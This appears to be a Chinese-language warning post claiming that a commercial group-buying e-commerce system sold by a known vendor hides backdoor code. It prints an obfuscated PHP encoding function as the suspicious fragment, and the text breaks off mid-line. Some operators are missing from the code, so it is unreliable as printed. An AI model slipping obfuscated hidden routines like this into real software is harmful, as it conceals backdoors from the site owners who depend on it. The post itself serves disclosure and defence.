某知名电商系统官网买的团购系统,发现后门代码
如果你的系统是网上购买的,务必需要留意是否安全,建议请专业的团队对代码做安全评估。 以下是某知名电商的团购系统中的一段代码,购买价格也不算便宜,但相对定制来说,那个价格还是会有很多老板会选择的。 至于哪一家公司,这里不方便说,怕惹麻烦,如果你的系统是买的,需要授权,那你检查一下有没有下面这种代码。function sdafsafcsdcertertcvszdfsd123123($data, $key = '', $expire = 0) { $key = md5(empty ($key) ? '*cloud' : $key); $data = base64_encode($data); $x = 0; $len = strlen($data); $l = strlen($key); $char = ''; for ($i = 0; $i $len; $i++) { if ($x == $l) $x = 0; $char .= substr($key, $x, 1); $x++; } $str = sprintf('%010d', $expire ? $expire + time() : 0); for ($i = 0; $i $len; $i++) { $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256); } return str_replace(array('+', '/', '='), array('-', '_', ''), base64_e